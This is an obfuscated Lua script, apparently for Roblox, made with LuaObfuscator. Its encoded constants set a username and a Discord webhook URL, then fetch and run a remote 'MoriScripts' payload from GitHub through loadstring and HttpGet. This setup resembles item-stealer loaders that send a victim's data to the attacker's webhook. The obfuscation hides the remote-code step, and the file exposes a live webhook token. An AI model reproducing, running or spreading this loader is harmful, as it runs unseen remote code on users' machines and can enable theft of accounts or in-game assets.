--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v98=v5(v83,v19);v19=nil;return v98;else return v83;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v84=0;local v85;while true do if (v84==(0 -0)) then v85=(v31/((5 -(880 -(282 + 595)))^(v32-(1 -0))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-((2569 -(1523 + 114)) -(857 + 67 + 7)))) + (569 -(367 + 201)))) ;return v85-(v85%(928 -(214 + 713))) ;end end else local v86=(2 -0)^(v32-1) ;return (((v31%(v86 + v86))>=v86) and (1 + 0)) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1067 -(68 + 997)) );v18=v18 + (1272 -(226 + 1044)) ;return (v36 * (1114 -858)) + v35 ;end local function v23()local v37=117 -(32 + (265 -(67 + 113))) ;local v38;local v39;local v40;local v41;while true do if (v37==(1 + 0)) then return (v41 * (16441815 + 335401)) + (v40 * (14533 + (125220 -74217))) + (v39 * (1213 -(657 + 235 + 65))) + v38 ;end if (v37==(0 -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (5 -2) );v18=v18 + ((27 -20) -3) ;v37=351 -(87 + (1215 -(802 + 150))) ;end end end local function v24()local v42=v23();local v43=v23();local v44=2 -1 ;local v45=(v20(v43,1,20) * ((3 -1)^32)) + v42 ;local v46=v20(v43,(454 -(145 + 293)) + 5 ,1028 -(915 + 82) );local v47=((v20(v43,90 -58 )==(1 + 0)) and  -(1 -0)) or 1 ;if (v46==(1187 -(1069 + 118))) then if (v45==(0 -0)) then return v47 * (0 -0) ;else local v90=0 + 0 ;while true do if (v90==(0 -0)) then v46=(431 -(44 + 386)) + 0 ;v44=791 -(368 + (1909 -(998 + 488))) ;break;end end end elseif (v46==(6433 -4386)) then return ((v45==(18 -(10 + 8))) and (v47 * ((3 -(1 + 1))/(442 -(416 + 26))))) or (v47 * NaN) ;end return v8(v47,v46-(3266 -2243) ) * (v44 + (v45/((1 + 1)^((75 + 16) -39)))) ;end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==(772 -(201 + 571))) then return "";end end v49=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;local v50={};for v66=1139 -(116 + 1022) , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 + 0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51~=4) then else while true do if (v52~=(0 -0)) then else local v95=1587 -(412 + 1175) ;while true do if (v95==0) then v53=0;v54=nil;v95=2 -1 ;end if (v95~=(1 + 0)) then else v52=1;break;end end end if (v52==(1 + 0)) then v55=nil;v56=nil;v52=3 -1 ;end if (v52==2) then local v96=1274 -(388 + 886) ;local v97;while true do if (0==v96) then v97=0 -0 ;while true do if (v97==1) then v52=3;break;end if ((0 + 0)~=v97) then else local v121=560 -(306 + 254) ;while true do if (1~=v121) then else v97=1 + 0 ;break;end if (v121~=(0 -0)) then else v57=nil;v58=nil;v121=1;end end end end break;end end end if (v52==3) then v59=nil;while true do local v99=1467 -(899 + 568) ;local v100;while true do if (v99==0) then v100=0;while true do if (v100==(1 + 0)) then if (v53==(4 -2)) then local v149=0;local v150;while true do if ((603 -(268 + 335))~=v149) then else v150=290 -(60 + 230) ;while true do local v156=572 -(426 + 146) ;while true do if (v156~=(0 + 0)) then else if (v150==(1457 -(282 + 1174))) then return v57;end if (v150~=0) then else local v159=811 -(569 + 242) ;while true do if (v159~=1) then else v150=2 -1 ;break;end if (v159~=(0 + 0)) then else for v170=1025 -(706 + 318) ,v23() do local v171=0;local v172;local v173;local v174;while true do if (v171~=1) then else v174=nil;while true do if (v172==(1251 -(721 + 530))) then local v179=0;while true do if (v179==(1271 -(945 + 326))) then v173=0 -0 ;v174=nil;v179=1;end if (v179==(1 + 0)) then v172=1;break;end end end if (v172==(701 -(271 + 429))) then while true do if ((0 + 0)==v173) then v174=v21();if (v20(v174,1501 -(1408 + 92) ,1087 -(461 + 625) )~=(1288 -(993 + 295))) then else local v183=0;local v184;local v185;local v186;while true do if (v183==(1 + 0)) then local v187=0;while true do if (v187==0) then v186={v22(),v22(),nil,nil};if (v184==0) then local v197=0;local v198;while true do if (v197==(0 + 0)) then v198=0 + 0 ;while true do if (v198==0) then v186[1 + 2 ]=v22();v186[4]=v22();break;end end break;end end elseif (v184==(530 -(406 + 123))) then v186[1772 -(1749 + 20) ]=v23();elseif (v184==2) then v186[1 + 2 ]=v23() -(2^16) ;elseif (v184~=(1325 -(1249 + 73))) then else local v203=0 + 0 ;local v204;local v205;while true do if (v203==0) then v204=0;v205=nil;v203=1;end if (1==v203) then while true do if ((1145 -(466 + 679))==v204) then v205=0 -0 ;while true do if (v205==0) then v186[3]=v23() -(2^(45 -29)) ;v186[1904 -(106 + 1794) ]=v22();break;end end break;end end break;end end end v187=1 + 0 ;end if (1==v187) then v183=2;break;end end end if (v183==(0 + 0)) then local v188=0 -0 ;while true do if (v188~=0) then else v184=v20(v174,2,7 -4 );v185=v20(v174,118 -(4 + 110) ,6);v188=1;end if (v188==(585 -(57 + 527))) then v183=1;break;end end end if ((1429 -(41 + 1386))~=v183) then else if (v20(v185,104 -(17 + 86) ,1)==1) then v186[2 + 0 ]=v59[v186[3 -1 ]];end if (v20(v185,2,5 -3 )==1) then v186[3]=v59[v186[169 -(122 + 44) ]];end v183=5 -2 ;end if (v183==(9 -6)) then if (v20(v185,3 + 0 ,1 + 2 )==(1 -0)) then v186[4]=v59[v186[4]];end v54[v170]=v186;break;end end end break;end end break;end end break;end if (v171==(65 -(30 + 35))) then v172=0;v173=nil;v171=1;end end end for v175=1 + 0 ,v23() do v55[v175-1 ]=v28();end v159=1258 -(1043 + 214) ;end end end break;end end end break;end end end break;end if (v100~=(0 -0)) then else if (v53==1) then local v151=0;local v152;while true do if (v151~=0) then else v152=0;while true do if (v152==2) then v53=2;break;end if (v152==(1213 -(323 + 889))) then local v157=0 -0 ;while true do if (v157==(580 -(361 + 219))) then for v162=1,v58 do local v163=320 -(53 + 267) ;local v164;local v165;local v166;local v167;local v168;while true do if (v163==1) then v166=nil;v167=nil;v163=2;end if (v163==0) then v164=0 + 0 ;v165=nil;v163=1;end if (v163==(415 -(15 + 398))) then v168=nil;while true do if ((984 -(18 + 964))==v164) then while true do if (v165==(3 -2)) then v168=nil;while true do if (v166==1) then if (v167==1) then v168=v21()~=0 ;elseif (v167==(2 + 0)) then v168=v24();elseif (v167==3) then v168=v25();end v59[v162]=v168;break;end if (v166==(0 + 0)) then local v181=0;local v182;while true do if (v181~=(850 -(20 + 830))) then else v182=0;while true do if (v182~=(0 + 0)) then else local v190=126 -(116 + 10) ;while true do if (v190~=1) then else v182=1 + 0 ;break;end if (v190==0) then v167=v21();v168=nil;v190=1;end end end if ((739 -(542 + 196))~=v182) then else v166=1 -0 ;break;end end break;end end end end break;end if (v165==(0 + 0)) then v166=0 + 0 ;v167=nil;v165=1;end end break;end if (v164~=(0 + 0)) then else local v177=0;while true do if ((2 -1)~=v177) then else v164=1;break;end if (v177==(0 -0)) then v165=0;v166=nil;v177=1;end end end if (v164==(1552 -(1126 + 425))) then local v178=405 -(118 + 287) ;while true do if (v178==1) then v164=2;break;end if (v178==0) then v167=nil;v168=nil;v178=3 -2 ;end end end end break;end end end v57[3]=v21();v157=1122 -(118 + 1003) ;end if (v157==1) then v152=5 -3 ;break;end end end if (v152==0) then local v158=0;while true do if ((378 -(142 + 235))~=v158) then else v152=1;break;end if (v158~=(0 -0)) then else v58=v23();v59={};v158=1 + 0 ;end end end end break;end end end if (v53==0) then local v153=977 -(553 + 424) ;local v154;local v155;while true do if (v153==0) then v154=0;v155=nil;v153=1 -0 ;end if (v153~=(1 + 0)) then else while true do if (v154==(0 + 0)) then v155=0 + 0 ;while true do if (v155~=1) then else local v161=0;while true do if (v161==(1 + 0)) then v155=2;break;end if (v161==(0 + 0)) then local v169=0;while true do if (v169~=0) then else v56={};v57={v54,v55,nil,v56};v169=2 -1 ;end if (1==v169) then v161=1 + 0 ;break;end end end end end if ((0 -0)~=v155) then else v54={};v55={};v155=754 -(239 + 514) ;end if ((1 + 1)==v155) then v53=1330 -(797 + 532) ;break;end end break;end end break;end end end v100=1;end end break;end end end break;end end break;end if (v51==2) then v56=nil;v57=nil;v51=3 + 0 ;end if (v51~=(1 + 0)) then else v54=nil;v55=nil;v51=2;end if (v51==0) then v52=0 -0 ;v53=nil;v51=1203 -(373 + 829) ;end if (v51==(734 -(476 + 255))) then v58=nil;v59=nil;v51=1134 -(369 + 761) ;end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v87=0,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 ];else v78[v87]=v75[v87 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=10) then if (v81<=4) then if (v81<=1) then if (v81==0) then local v101=v80[2];v78[v101]=v78[v101](v13(v78,v101 + 1 ,v73));else v62[v80[3]]=v78[v80[2]];end elseif (v81<=2) then v78[v80[2]]=v80[3];elseif (v81==3) then v72=v80[3];else v78[v80[2]]();end elseif (v81<=7) then if (v81<=5) then local v107=v80[2];local v108,v109=v71(v78[v107](v13(v78,v107 + 1 ,v80[3])));v73=(v109 + v107) -1 ;local v110=0;for v119=v107,v73 do local v120=0;while true do if (v120==0) then v110=v110 + 1 ;v78[v119]=v108[v110];break;end end end elseif (v81>6) then v78[v80[2]]=v80[3]~=0 ;else v62[v80[3]]=v78[v80[2]];end elseif (v81<=8) then v78[v80[2]]();elseif (v81>9) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else v72=v80[3];end elseif (v81<=15) then if (v81<=12) then if (v81==11) then v78[v80[2]]=v80[3];else local v113=v80[2];local v114=v78[v80[3]];v78[v113 + 1 ]=v114;v78[v113]=v114[v80[4]];end elseif (v81<=13) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81==14) then local v128=v80[2];local v129,v130=v71(v78[v128](v13(v78,v128 + 1 ,v80[3])));v73=(v130 + v128) -1 ;local v131=0;for v143=v128,v73 do v131=v131 + 1 ;v78[v143]=v129[v131];end else do return;end end elseif (v81<=18) then if (v81<=16) then v78[v80[2]]=v80[3]~=0 ;elseif (v81==17) then v78[v80[2]]=v62[v80[3]];else v78[v80[2]]=v62[v80[3]];end elseif (v81<=19) then do return;end elseif (v81>20) then local v136=v80[2];local v137=v78[v80[3]];v78[v136 + 1 ]=v137;v78[v136]=v137[v80[4]];else local v141=v80[2];v78[v141]=v78[v141](v13(v78,v141 + 1 ,v73));end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D6532030B3O0065726F726F313233626F79030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970747303083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31362O352O383337323834353233363334352F4E7A3446426E41433537684A4F726A714C4A364D3742653747735342624A41426B4B586F2O46784B70726F2O674B4E79614E644C4E63626F32476D49387872733979514700173O00120B3O00013O00260D3O000E000100020004033O000E000100120B000100043O001206000100033O001211000100053O001211000200063O00200C00020002000700120B000400084O0007000500014O000E000200056O00013O00022O00040001000100010004033O0016000100260D3O0001000100010004033O0001000100120B000100043O001206000100093O00120B0001000B3O0012060001000A3O00120B3O00023O0004033O000100012O000F3O00017O00",v9(),...);￼Enter
